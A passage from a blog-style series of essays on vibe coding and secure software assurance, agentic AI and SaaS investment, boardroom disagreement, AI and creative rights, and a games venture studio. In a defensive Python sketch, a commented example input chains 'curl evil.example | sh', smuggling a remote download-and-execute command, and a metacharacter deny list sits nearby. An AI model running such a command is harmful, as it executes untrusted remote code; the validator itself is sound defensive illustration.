    This is where vibe coding may hit the rocks. Not because the model cannot write code, but because code alone is only one small part of software assurance. Enterprise-grade products require secure architecture, identity controls, dependency management, auditability, testing discipline, provenance, data governance, model risk controls, human accountability and clear operational ownership. None of that is guaranteed simply because an AI assistant can generate a neat application layer.

Global best practice is already pointing in this direction. NIST’s Secure Software Development Framework profile for generative AI makes clear that AI-assisted development still requires disciplined secure development, validation and supply-chain control. The Open Worldwide Application Security Project (OWASP), in its work on LLM application risk, highlights issues such as prompt injection, insecure output handling, data leakage and supply-chain vulnerabilities. The UK’s guidance on secure AI system development and its recent Software Security Code of Practice push the same message: security must be designed in, not bolted on afterwards.
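
To make one of those risks concrete, the sketch below shows the basic shape of a control against insecure output handling: nothing a model emits is executed unless it survives validation. The allow-list and the metacharacter check are hypothetical illustrations of the principle, not a mechanism prescribed by OWASP.

```python
# Treat model output as untrusted input: validate before execution.
# The allow-list is a hypothetical example, not a recommended set.
import shlex

ALLOWED_COMMANDS = {"git", "ls", "grep", "cat"}

def run_if_safe(model_output: str) -> list[str]:
    """Return argv for a vetted command, or raise instead of executing."""
    if any(meta in model_output for meta in (";", "|", "&", "`", "$(", ">")):
        raise PermissionError("shell metacharacters rejected")
    tokens = shlex.split(model_output)
    if not tokens or tokens[0] not in ALLOWED_COMMANDS:
        raise PermissionError(f"command not on the allow-list: {model_output!r}")
    return tokens  # safe to hand to subprocess.run(tokens), never shell=True

print(run_if_safe("ls -la reports/"))                  # ['ls', '-la', 'reports/']
# run_if_safe("cat notes.txt; curl evil.example | sh") # raises PermissionError
```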

    That matters commercially. A great many AI-generated products and services being built today are exciting, useful and investable at the prototype stage, but they are not yet enterprise ready in the full sense of the term. They may lack code provenance, robust access control, explainable governance, secure deployment patterns, red-team testing, policy enforcement and evidence that they can survive procurement due diligence. In other words, there is a widening gap between AI-enabled software creation and enterprise-grade software assurance.

    Why S2aaS could matter

    That gap is precisely where an opportunity emerges. I believe there is a growing market for a Secure Software as a Service model — S2aaS — sitting above or alongside the current generation of agentic and SaaS platforms. The proposition would not simply be to host software, nor merely to generate it faster, but to wrap AI-enabled product development in a governed, continuously monitored, policy-driven security and assurance layer. This would include secure coding controls, architectural review, software bill of materials, vulnerability scanning, secrets management, model governance, compliance mapping, runtime monitoring and board-level assurance reporting.

    In practical terms, S2aaS could become the trust fabric for the vibe coding economy. Start-ups could build at speed, but within a managed security and governance envelope. Mid-sized firms could adopt AI-generated internal tools without carrying the full burden of building a mature software assurance capability themselves. Large enterprises could accelerate innovation while retaining procurement-grade evidence, audit trails and risk visibility. Regulators and boards would be more likely to support innovation if they can see that clear control frameworks exist around it.

    Beyond Agentic AI versus SaaS

    This is also why the debate between Agentic AI and traditional SaaS may be missing a deeper point. The next battleground may not simply be who automates more work. It may be who can deliver trusted automation at scale. In that world, S2aaS starts to look less like a niche service and more like SaaS 2.0: software delivery fused with security, governance, compliance and assurance by design.

    My conclusion

    My conclusion is therefore straightforward. Vibe coding is real, powerful and economically important. But on its own it is not enough for serious enterprise deployment. The winners in the next phase of the market may not be those who generate the most code the fastest. They may be the organisations that make AI-generated software trustworthy, governable and insurable. That is where value migrates once the first excitement fades.

    So yes, I believe there is an opportunity here. The space between AI-generated software and enterprise trust is not a minor implementation issue. It is a strategic market gap. And for advanced security and governance organisations prepared to package that capability as a service, S2aaS could prove to be one of the most important commercial categories to emerge from the age of AI-assisted software development.

    Reference points informing the argument

    • NIST SP 800-218A, Secure Software Development Practices for Generative AI and Dual-Use Foundation Models (2024).

    • NIST AI Risk Management Framework (AI RMF).

    • OWASP Top 10 for LLM Applications 2025.

    • NCSC / CISA / partner agencies: Guidelines for Secure AI System Development.

    • UK Government, Code of Practice for the Cyber Security of AI (2025).

• UK Government, Software Security Code of Practice (2025).

    • European Commission, General-Purpose AI Code of Practice (2025).

  • Agentic AI vs SaaS: Is This the Beginning of the End — or the Next Evolution?

    Over the past few months, I have been asked the same provocative question again and again: “Will Agentic AI be the nail in the coffin for SaaS?” It’s a good question. But I think it’s the wrong one.

    The real question is this: Will Agentic AI expose which SaaS companies actually own real value — and which ones were simply renting convenience in the cloud? For the past two decades SaaS has been one of the most successful business models in technology.

    Subscription revenue, predictable cash flow, scalable delivery, and strong margins made it incredibly attractive to founders and investors alike. But a large portion of SaaS value has historically been built around user interfaces, workflow routing, dashboards, form entry and seat-based licences. In other words, SaaS often organised work rather than actually doing the work.

    Agentic AI changes that equation.

Agentic AI systems can plan, execute and manage multi-step workflows autonomously. Instead of humans navigating multiple software tools, AI agents can increasingly complete the task themselves — resolving support tickets, updating CRM records, generating reports, reconciling invoices, or coordinating procurement processes. In short, the interface layer that defined much of SaaS may no longer be the centre of gravity. That doesn’t mean SaaS disappears. But it does mean the economic model behind many SaaS companies is now under scrutiny.

    The companies that survive this shift will not be those that simply provide software. They will be those that control data, own critical workflows, operate in trusted domains, and can price based on outcomes rather than user seats. This is not the death of software. It is the transition from SaaS 1.0 to something much more autonomous.

    The Venture Capital Perspective

    From a venture capital perspective, software investment is not slowing down — but the type of software being funded is changing rapidly. AI companies accounted for the majority of venture capital investment in 2025, with roughly 61% of global VC funding going into AI-related companies [1]. Enterprise adoption is also accelerating quickly. One report found that 76% of enterprise AI deployments were purchased solutions rather than internally built systems [2]. In other words, investors are still enthusiastic about software businesses. They are simply shifting their capital toward AI-native platforms, vertical AI applications and agent-enabled workflow systems.

    What venture capitalists are becoming more cautious about is traditional SaaS that sits in the middle of a workflow but does not own the underlying data, decision logic, or automation layer. If an AI agent can orchestrate work across multiple tools, the value of those tools changes dramatically. The key question VCs now ask founders is simple: Why will your software still matter when AI agents can do the work themselves?

    Private Equity’s View

    Private equity investors are approaching the issue with characteristic pragmatism. Technology remains one of the most active sectors for private equity investment. Tech deals represented around 22% of North American private equity transactions in early 2025, and funds still hold hundreds of billions in undeployed capital targeting technology assets [3]. But the classic private equity SaaS playbook is under pressure. For years, PE firms could acquire a promising SaaS company, rely on rapid market expansion, increase revenue growth, and benefit from multiple expansion. Historically, the majority of value creation in technology buyouts came from revenue growth and valuation increases rather than operational improvements [3].

    Today that strategy looks more fragile. Higher interest rates, slower SaaS growth curves, and the disruptive potential of AI are forcing PE firms to become more selective. They are increasingly focused on companies that can use AI to improve margins, automate operations, and deepen product differentiation. In other words, private equity is not abandoning SaaS. It is simply demanding that SaaS businesses evolve into AI-enabled platforms with durable competitive advantages.

    The Family Office Perspective

    Family offices provide a particularly interesting perspective because their investment horizons are often longer and their capital structures more flexible. Most family offices already have some exposure to artificial intelligence. One report suggested that around 86% of family offices now have AI exposure, primarily through public market investments [4]. At the same time, around 65% intend to increase their focus on AI-related investments in the coming years [5].

    However, family offices are also becoming more cautious about valuations and private market liquidity. Despite this caution, both AI and SaaS continue to attract significant family office capital. In fact, venture deal values involving family offices more than doubled for both AI/ML and SaaS companies between 2023 and 2025, even though the total number of deals declined [6]. What this tells us is that family offices are concentrating capital into fewer, higher-quality opportunities rather than retreating from the sector entirely.

    They are asking the same question as other investors: Does this software business still matter in a world where intelligent agents are everywhere?

    My Conclusion

    So, will Agentic AI be the nail in the coffin for SaaS? For weak SaaS businesses, possibly yes. Companies with shallow product differentiation, limited data advantages and purely seat-based pricing models may find their value proposition eroded as automation expands. But for strong software companies, Agentic AI is not a coffin — it is a catalyst. It pushes the industry toward outcome-based software, deeper automation, and products that sit closer to real economic activity rather than simply organizing information. The companies that win in the next decade will not be those that simply manage workflows. They will be the ones whose systems actually perform the work, control the data, and deliver measurable outcomes.

    Serious investors are not turning away from software. They are simply becoming less tolerant of SaaS businesses that cannot explain why they will still matter in an AI-native world. And that may ultimately be the healthiest thing that could happen to the software industry.

    References

    [1] OECD – Venture Capital Investments in Artificial Intelligence Through 2025

    [2] Menlo Ventures – State of Generative AI in the Enterprise Report

    [3] Bain & Company – Global Technology Report 2025

    [4] Goldman Sachs – Family Office Investment Insights Report

    [5] J.P. Morgan – Global Family Office Report 2026

    [6] PwC – Global Family Office Deals Study 2025

  • The Importance of Board Disagreements

    The Importance of Board Disagreements

    Corporate boards exist at the heart of modern governance. They sit between ownership and management, responsible for ensuring that organisations are directed and controlled in ways that create long-term value while protecting the interests of stakeholders. The board’s responsibilities include oversight of strategy, monitoring performance and risk, and ensuring accountability to shareholders, regulators and society at large. Directors are therefore not merely advisers to management; they are stewards of the enterprise and must exercise independent judgement in the interests of the organisation’s future. 

    In practice, this responsibility requires boards to do far more than simply endorse the views of executives. The board’s purpose is to challenge, test and refine management thinking. Good governance depends on maintaining a clear distinction between those who run the company day-to-day and those who oversee its direction. Executives manage operations, while the board provides oversight, strategic guidance and accountability, ensuring that management decisions are aligned with the long-term interests of the company and its stakeholders. 

    One of the most misunderstood aspects of board effectiveness is the role of disagreement. Many people unfamiliar with governance assume that a well-functioning board should be harmonious and unified. In reality the opposite is often true. Healthy disagreement is not a sign of dysfunction but of engagement. When directors bring different perspectives, experiences and expertise into the room, debate becomes a powerful tool for better decision-making. Research on boardroom dynamics shows that “vigorous dissent” around strategic issues improves decision quality and helps boards avoid groupthink. 

    The danger of excessive consensus is that it can allow the status quo to persist unchallenged. Organisations, particularly successful ones, can easily fall into patterns of thinking that go unquestioned over time. Boards are uniquely positioned to disrupt this complacency. Non-executive directors and chairs are deliberately placed one step removed from daily management so that they can bring independence of thought and a broader perspective. Their role is to ask difficult questions: Why are we pursuing this strategy? What risks are we overlooking? What alternative options should be considered?

    Throughout my own career as a Chair and Non-Executive Director across multiple organisations, I have repeatedly seen how constructive disagreement strengthens decision-making. Boards are composed of individuals with different backgrounds, sectors of experience and personal insights. When those perspectives collide respectfully, they force deeper analysis and more robust conclusions. The best boardrooms I have been part of were not silent or overly polite; they were intellectually demanding environments where directors felt confident enough to question assumptions and challenge the executive team.

    This dynamic is essential because boards carry responsibilities that extend beyond shareholders alone. Directors must consider the impact of decisions on employees, customers, suppliers, communities and other stakeholders. Modern corporate governance frameworks emphasise the duty of directors to act in good faith and in the best interests of the company while balancing the expectations of multiple stakeholder groups. Such complexity inevitably generates differing viewpoints. A strategy that benefits shareholders in the short term may carry risks for employees or long-term sustainability. Debate in the boardroom allows those competing considerations to be surfaced and evaluated properly.

    The role of the Chair is particularly important in managing this process. Encouraging disagreement does not mean allowing conflict to become personal or destructive. Effective chairs create an environment where directors feel able to express opposing views while maintaining respect and trust among board members. Governance research distinguishes between “task conflict,” which focuses on differing ideas and strategies, and “relationship conflict,” which becomes personal and damaging. The challenge is to foster the former while preventing the latter. 

    In practice, this often means structuring discussions carefully and ensuring that every voice in the room is heard. Some directors are naturally more vocal than others, and the Chair must ensure that quieter members are invited into the debate. Diverse boards—whether in terms of professional background, gender, nationality or sector experience—tend to generate richer discussions precisely because they bring different mental models to the table. Diversity, therefore, is not only a social or ethical consideration but also a governance advantage.

    Yet disagreement is only the first step. Ultimately, a board must reach decisions. One of the defining features of effective governance is the ability of directors to debate vigorously and then unite behind a collective conclusion. Once a board decision is made, it becomes the responsibility of all directors to support that outcome publicly, even if individual members initially held different views. This principle of collective responsibility ensures that management receives clear direction and that the organisation benefits from decisive leadership.

    This pattern—robust debate followed by unified commitment—is one I have observed repeatedly across boards in different sectors. The discussions may be intense, the perspectives strongly held, and the analysis detailed. But when the process is conducted professionally and respectfully, the final outcome is almost always stronger than any single viewpoint brought into the room at the beginning.

    In an era of increasing complexity—technological disruption, regulatory change, sustainability pressures and geopolitical uncertainty—the importance of strong board governance has never been greater. Boards must guide organisations through uncertain terrain while safeguarding long-term value and stakeholder trust. To do this effectively, they must resist the temptation of easy consensus.

    The most effective boards are those where disagreement is not feared but welcomed. When directors challenge each other and the executive team with intellectual rigour, the board fulfils its true purpose: ensuring that decisions are examined from multiple perspectives and that the organisation moves forward with clarity and confidence. In that sense, disagreement in the boardroom is not a weakness. It is one of governance’s greatest strengths.

  • AI, Creativity, and the Next Rights Settlement: Why We Must Build the Future Without Hollowing Out the Artists

    AI, Creativity, and the Next Rights Settlement: Why We Must Build the Future Without Hollowing Out the Artists

    I’ve spent much of my professional life watching industries change when a new “general‑purpose” technology arrives. Telecoms did it with digitisation and the smartphone. Media did it with streaming. Now the creative industries are doing it with generative AI — tools that can draft, compose, visualise, summarise, mimic and remix at a scale that would have sounded implausible a few years ago.

    When I speak with artists, producers, commissioners, publishers, and the engineers building these systems, I hear two truths at once. First: AI is expanding what creative people can do. Second: the current economics and governance of AI risk extracting value from the creative ecosystem faster than it can replenish itself. The optimistic story and the cautionary story are both real. The question is whether we can hold on to the upside while fixing the terms of trade.

    A vivid example captures the moment. When will.i.am and Mercedes‑Benz set out to re‑imagine the electric driving experience, they built a system where music can be separated into components — drums, melody, vocals, synth — and then recomposed in real time using live signals from the vehicle: acceleration, braking, steering and suspension travel. The result isn’t a playlist; it’s an adaptive soundtrack shaped by the way you drive. Projects like MBUX Sound Drive are a clue: AI’s most interesting creative applications are rarely about replacing people. They’re about new formats that weren’t previously possible.
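
    To make that concrete, here is a minimal Python sketch of the underlying pattern: live driving signals mapped to per‑stem gain levels. The signal names, value ranges, and mapping rules are my own invented illustration, not the actual Sound Drive implementation.

    ```python
    # Illustrative toy model of telemetry-driven stem mixing --
    # my own sketch, not Mercedes' actual MBUX Sound Drive system.
    from dataclasses import dataclass

    @dataclass
    class Telemetry:
        accel: float       # 0.0 (coasting) .. 1.0 (full throttle)
        brake: float       # 0.0 .. 1.0
        steering: float    # 0.0 (straight) .. 1.0 (full lock)
        suspension: float  # 0.0 (smooth road) .. 1.0 (rough road)

    def clamp(x: float) -> float:
        return max(0.0, min(1.0, x))

    def mix_stems(t: Telemetry) -> dict[str, float]:
        """Map live driving signals to per-stem gain levels (0..1).

        The mapping rules are invented for illustration: harder
        acceleration brings drums forward, braking pulls the mix
        back, and steering input opens up the synth layer.
        """
        return {
            "drums":  clamp(0.4 + 0.6 * t.accel - 0.3 * t.brake),
            "melody": clamp(0.7 - 0.2 * t.brake),
            "vocals": clamp(0.6 - 0.4 * t.suspension),
            "synth":  clamp(0.3 + 0.5 * t.steering),
        }

    # A gentle corner under light throttle:
    print(mix_stems(Telemetry(accel=0.3, brake=0.0, steering=0.5, suspension=0.1)))
    ```

    The point is not the arithmetic; it is that the mix becomes a function of live context rather than a fixed recording.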

    That kind of work depends on people comfortable living in two worlds at once: code and culture. One of the most compelling thinkers I’ve read at this intersection is Manon Dave, who leads the Future World Design team within BBC Research & Development — a remit focused on what “public service creativity” becomes in an age of AI, immersive media and creator economies.

    Spending time listening to and reading people like Dave shifts how you think about AI. It’s not a single tool; it’s a new layer of capability. Used well, it compresses the distance between idea and execution. It lowers the cost of iteration. It expands the palette. It gives you a collaborator that never runs out of patience — a sounding board you can ask for ten variations, then a hundred more in a different style. For early adopters, that matters most at the exact points where creative work often stalls: writer’s block, a sonic idea you can’t quite capture, a concept that needs “one more angle” to land.

    This is where the public debate sometimes misses the point. Too much of it is framed as “will AI replace creators?” In most real creative workflows, replacement is not the right model. Collaboration is. Contemporary pop is commonly written by teams; major productions involve dozens of specialist roles. Creative work is already multi‑author. AI becomes another participant — but one whose contribution must be governed and accounted for if we want the ecosystem to remain fair.

    Historical analogies help us stay calm, but they don’t let us be complacent. When the synthesizer arrived, it provoked predictable anxiety. When Auto‑Tune became mainstream, it was treated as scandalous by some and indispensable by others. In time, both technologies became part of the standard toolkit, and the world didn’t end. What audiences ultimately rewarded was taste, originality and emotional truth.

    Generative AI differs from prior creative technologies in one crucial respect: how it learns. A synthesizer doesn’t need millions of recordings to be ingested. Auto‑Tune doesn’t require training on the back catalogue of human voices. Generative models, by contrast, are built by training on large datasets — and those datasets often contain copyrighted works. That’s why rights, consent and attribution aren’t side issues. They are the central issues.

    If AI becomes a system that can ingest the world’s creative output, learn from it, and then compete with it — while creators have no practical way to see what was taken, no practical way to license it, and no practical way to be paid — the long‑term result is a slow hollowing out. We get more content, cheaper content, faster content — and fewer sustainable careers to create the next generation of high‑quality work.

    We can already see the same tension in journalism, where publishers argue that large‑scale scraping and reuse by AI systems is undermining the economics of original reporting. When major UK news organisations coordinate publicly to push for standards around consent, attribution and licensing, that is a signal that the basic value exchange is breaking down.

    At the same time, we have to engage honestly with the arguments on the other side. AI developers — and some policymakers — claim that broad access to data is necessary for innovation, that training is “transformative” rather than substitutive, and that heavy disclosure requirements could slow progress or expose commercial secrets. In the United States, at least one significant court ruling has leaned toward the view that training on copyrighted books can be fair use in certain circumstances, even while condemning the storage of pirated copies — a reminder that the legal landscape is contested and evolving.

    So what do we do? I think we need to treat “AI and creativity” as three problems with three kinds of remedies.

    The first is the fun one: keep building genuinely new formats — work that is additive rather than extractive. Sound Drive is interesting because it’s about interaction, not imitation. The same is true of experiments that make audio more immersive, make education more adaptive, or make accessibility features more powerful. In a BBC context, the most interesting question isn’t “can a model write a script?” It’s “what does public service storytelling look like when information can be contextual, conversational and responsive — and when audiences can participate rather than merely receive?” A modern re‑imagining of Ceefax for the age of conversational systems isn’t about replacing journalists. It’s about adding a layer of context that helps audiences make sense of what they’re already watching, without destroying the shared experience of watching together.

    The second is the “boring plumbing”: attribution, provenance and authenticity. If we can’t say where media came from, how it was edited, and what tools were used, trust collapses — and with it, the ability to pay creators for verified work. That’s why open provenance standards such as C2PA matter. They are not a silver bullet, but they are the kind of infrastructure that makes a healthier ecosystem possible in a world of cheap synthetic media.
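
    C2PA itself works through signed manifests embedded in media files. The sketch below is a deliberately simplified stand‑in for that idea, showing the minimum any provenance scheme needs: a content hash bound to a signed claim about origin and tools. The record structure and the HMAC “signature” are my own toy illustration, not the C2PA manifest format, which uses certificate‑based signing.

    ```python
    # A deliberately simplified provenance record -- illustrating the idea
    # behind standards like C2PA, not the actual C2PA manifest format.
    import hashlib
    import hmac
    from dataclasses import dataclass, field

    SIGNING_KEY = b"demo-key"  # real systems use X.509 certificates, not a shared key

    @dataclass
    class ProvenanceRecord:
        content_hash: str          # hash of the media bytes this claim covers
        creator: str               # who asserts authorship
        tools_used: list[str] = field(default_factory=list)
        signature: str = ""

    def make_record(media: bytes, creator: str, tools: list[str]) -> ProvenanceRecord:
        content_hash = hashlib.sha256(media).hexdigest()
        payload = f"{content_hash}|{creator}|{','.join(tools)}".encode()
        sig = hmac.new(SIGNING_KEY, payload, hashlib.sha256).hexdigest()
        return ProvenanceRecord(content_hash, creator, tools, sig)

    def verify(media: bytes, rec: ProvenanceRecord) -> bool:
        """True only if the media is unmodified and the claim is untampered."""
        if hashlib.sha256(media).hexdigest() != rec.content_hash:
            return False  # media was edited after the claim was made
        payload = f"{rec.content_hash}|{rec.creator}|{','.join(rec.tools_used)}".encode()
        expected = hmac.new(SIGNING_KEY, payload, hashlib.sha256).hexdigest()
        return hmac.compare_digest(expected, rec.signature)

    image = b"...raw image bytes..."
    record = make_record(image, "Jane Artist", ["camera", "colour-grade"])
    assert verify(image, record)
    assert not verify(image + b"tampered", record)
    ```

    Real standards add certificate chains, edit histories, and tamper‑evident embedding, but the verification logic follows the same shape.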

    The third is the hard one: an enforceable rights settlement for training data and downstream use, built on four basics — meaningful consent, workable transparency, scalable remuneration, and accountability across the value chain.

    If those principles feel demanding, consider the alternative. Without them, we will drift into a market where a small number of platform companies capture most of the value, while creative labour is treated as an unpriced input. That outcome is not inevitable — but it will happen by default if we don’t actively design against it.

    I’m also wary of the lazy claim that AI will “level the playing field” automatically. It can, but only under certain conditions. AI gives superpowers to people who already have taste, craft and domain knowledge. A strong writer uses it to explore structure and argument faster. A skilled producer uses it to audition sonic ideas and refine arrangement choices. A great designer uses it to test composition and iterate. But when the foundation isn’t there, you often get a glossy imitation: technically passable, emotionally empty, instantly forgettable. In a market flooded with that kind of output, genuine skill becomes more valuable — but only if the economics of skill remain viable.

    I’m cautiously optimistic about the next decade. Entertainment will become more adaptive. Interfaces will become more personalised. Media will become more conversational. The best experiences will be those that treat AI as a co‑pilot, not an author — a system that helps humans do more human things, not less.

    But optimism is not a plan. A plan requires institutions — broadcasters, publishers, labels, collecting societies, regulators, standards bodies, and responsible AI developers — to align on foundations: workable licensing models, provenance standards embedded into tools and platforms, and transparency requirements that don’t collapse under lobbying. Above all, we need to make it easy for a creator — not just a major corporation — to set the terms under which their work can be used.

    The best future is one where creators can experiment with AI freely, where new forms flourish, and where rights are respected not as an afterthought but as a design constraint. If we get that right, AI will not be the end of creativity. It will be the beginning of a new creative era — one that rewards imagination and craftsmanship while ensuring the people who make culture can still make a living from it.

  • From Exit to Re‑Entry: A Manifesto for Agentic AI, Living Worlds, and the Next Era of Games

    From Exit to Re‑Entry: A Manifesto for Agentic AI, Living Worlds, and the Next Era of Games

    I have spent much of my professional life at the intersection of creativity, technology, and commercial reality. Games sit precisely at that crossroads. They are cultural artefacts, technical achievements, and economic engines all at once. When they succeed, it is because those three forces are aligned. When they fail, it is almost always because one has been allowed to dominate the others.

    This manifesto explains why exiting Lucid Games was the right decision at the right time, why I am now re‑entering the market through WayBeyond Capital Ventures, and why agentic AI represents not just another toolset, but a structural shift in how interactive (and many other) worlds will be imagined, built, governed, and sustained.

    This is written not as a prediction, but as a position.

    Technology has always been the canvas, not the backdrop

    Game developers have never waited for technology to mature politely. They push it, bend it, and often break it. From early arcade machines to modern real‑time engines, games have consistently acted as stress tests for computation, graphics, networking, and human‑computer interaction; indeed, it is arguable that this is why GPUs were invented!

    What matters is not raw capability, but what capability enables creatively. Each technological step forward reshapes production methods, team structures, budgets, and ultimately player expectations. That is why the current moment matters so much.

    Agentic AI is not an incremental improvement on existing tools. It represents a change in ‘kind’, not just degree.

    Unlike generative systems that respond to prompts, agentic systems can pursue goals, maintain memory, adapt strategies, and operate across multiple steps without constant human instruction. When applied to games, this changes the nature of interaction itself. It moves us from scripted illusion toward genuine behavioural complexity.
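
    A minimal sketch of what that difference looks like in code: rather than walking a fixed script, the agent below holds a persistent goal and a memory, and loops through sense, plan, and act on every tick. The world model, the goal, and the planning rules are toys of my own invention, not any shipping game system.

    ```python
    # Toy sense-plan-act loop for an agentic NPC -- my own minimal
    # illustration of goal pursuit with memory, not a production system.

    class GuardAgent:
        def __init__(self, post: int):
            self.goal = ("hold_post", post)   # a persistent goal, not a script
            self.position = 0
            self.memory: list[str] = []       # observations persist across steps

        def sense(self, world: dict) -> None:
            if world.get("intruder_at") is not None:
                self.memory.append(f"intruder seen at {world['intruder_at']}")

        def plan(self, world: dict) -> str:
            # Adapt strategy from memory rather than follow a fixed sequence.
            if self.memory and world.get("intruder_at") is not None:
                return "pursue"
            if self.position != self.goal[1]:
                return "return_to_post"
            return "patrol"

        def act(self, action: str, world: dict) -> None:
            if action == "pursue":
                self.position = world["intruder_at"]
            elif action == "return_to_post":
                self.position += 1 if self.position < self.goal[1] else -1

        def step(self, world: dict) -> str:
            self.sense(world)
            action = self.plan(world)
            self.act(action, world)
            return action

    guard = GuardAgent(post=3)
    for world in [{"intruder_at": None}, {"intruder_at": 7}, {"intruder_at": None}]:
        print(guard.step(world), guard.position, guard.memory)
    ```

    Even at this toy scale, the design question shifts from “what happens at step three?” to “what behaviour emerges from these rules?” — which is exactly the shift from scripted illusion to behavioural complexity.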

    Why the Lucid Games exit mattered

    Lucid Games was a Liverpool‑born studio that proved it could operate on the global stage. As chairman, I was there from the beginning.

    The team delivered under pressure, navigated the realities of AAA expectations, and demonstrated real creative and technical capability.

    In July 2023, Lucid Games was acquired by LightSpeed Studios, a Tencent subsidiary. This was a pivotal moment for the company and for those of us involved in its governance. The acquisition validated the value that had been built and placed the studio within a platform capable of offering scale, stability, and long‑term runway.

    For me, it was a strategically clean exit.

    Exits are often mischaracterised as abandonment or retreat. In reality, a good exit is an act of stewardship. It recognises when a company’s next phase is better served inside a larger ecosystem, and when value creation has reached a point where risk and reward are no longer proportionate for existing stakeholders.

    The Lucid transaction crystallised value, reduced execution risk, and created something far more important than capital: optionality.

    The acquisition positioned Lucid within a global AAA platform with deep resources and long‑term publishing ambition. For the board and shareholders, it represented a successful outcome in a market increasingly characterised by consolidation and rising development costs.

    Optionality creates perspective

    Optionality buys time. Time allows reflection. Reflection reveals patterns.

    Stepping away from day‑to‑day studio operations made one thing abundantly clear: the industry is approaching another structural inflection point. Rising costs, longer development cycles, player fatigue with formulaic content, and increasing scrutiny around monetisation have all created pressure.

    Agentic AI arrives into this environment not as a silver bullet, but as a catalyst. It will not fix bad design, weak leadership, or exploitative business models. But it will amplify whatever philosophy sits beneath it.

    That is why the question is not “will agentic AI be used in games?” The question is “who will use it well, and to what end?”

    From scripted worlds to living systems

    For decades, so‑called AI in games has been built on scripts, decision trees, and bounded randomness. These techniques have delivered remarkable experiences, but they are ultimately fragile illusions. Once players see the seams, immersion collapses.

    Agentic AI offers a path toward worlds that are not merely decorated with activity, but structured around agency.

    Non‑player characters can pursue goals independently of the player. Worlds can respond systemically rather than reactively. Narrative becomes less about authored sequences and more about shaped possibility spaces.

    This does not eliminate the role of the designer. On the contrary, it elevates it. Designers move from writing behaviours to designing *conditions*. From scripting events to shaping ecosystems.

    Why a venture studio, not another studio

    When I decided to re‑enter the market, I was deliberate about structure. I did not want to build “another games company” in the traditional sense. The opportunity is broader than any single title.

    That is why, together with a set of brilliant strategists, I founded WayBeyond Capital Ventures as a venture studio.

    A venture studio is suited to moments of systemic change. It allows multiple ideas to be explored in parallel, shared infrastructure to be developed once, and talent to move fluidly across initiatives. It also allows governance, safety, and ethics to be embedded by design rather than bolted on later.

    WayBeyond Capital Ventures operates across technology, media, and telecommunications, because agentic systems do not respect sector boundaries. Games will be one of the most visible beneficiaries — but not the only one.

    The agentic lenses guiding re‑entry

    My re‑entry into gaming is guided by a set of lenses. These are not slogans. They are filters through which every opportunity is assessed.

    1. Living worlds, not larger maps 
    Scale is no longer measured in square kilometres. It is measured in density of believable behaviour. A small world that reacts intelligently will always outperform a vast but empty one.

    2. Agents as referees, not manipulators 
    Agentic systems can balance difficulty, detect unfair play, and manage pacing. Used correctly, they enhance trust. Used poorly, they become instruments of coercion.

    3. Production compression without creative hollowing 
    AI‑driven tools can remove enormous amounts of friction from development. But speed without taste produces mediocrity. Human judgement must remain central.

    4. Trust, safety, and governance by design 
    Agents can be subverted, manipulated, and pushed into unsafe behaviour. Robust guardrails, monitoring, and intervention systems are not optional — they are product fundamentals.

    5. Ethical monetisation as a hard constraint 
    An agent that emotionally nudges spending or withholds progress crosses a line. Long‑term value is built on respect, not exploitation.

    6. Augmenting, not erasing, human creativity 
    The future of games is not creator‑less. It is creator‑amplified. Removing drudgery should create space for imagination, not unemployment.

    The cultural responsibility of believable systems

    As worlds become more lifelike, the cultural responsibility of those who build them increases. Players form emotional relationships with characters, communities, and identities within games. Agentic systems deepen those bonds.

    That power must be handled carefully.

    Designers and leaders must ask not only “can we?” but “should we?” Not everything that is technically possible is culturally healthy or commercially sustainable.

    This is where governance becomes a competitive advantage rather than a compliance burden.

    Exit as preparation, not conclusion

    The Lucid exit was not the end of a chapter. It was the preparation for the next one.

    It created the distance needed to see clearly, the freedom to choose deliberately, and the responsibility to engage thoughtfully. Re‑entering the market now is not about chasing novelty. It is about shaping direction.

    Agentic AI will either deepen the medium or cheapen it. It will either empower creativity or industrialise it into sameness. The outcome depends entirely on the values of those who deploy it.

    The commitment

    WayBeyond Capital Ventures exists to back teams, platforms, and ideas that take this responsibility seriously. To build worlds that feel alive because they are coherent, responsive, and respectful — not because they are manipulative or overwhelming.

    This is not a call for unchecked acceleration. It is a call for disciplined imagination.

    The next era of games (and many other creative industries) will not be defined by how intelligent our systems become, but by how wisely we choose to use that intelligence.

    That is the work ahead. And that is why I am back.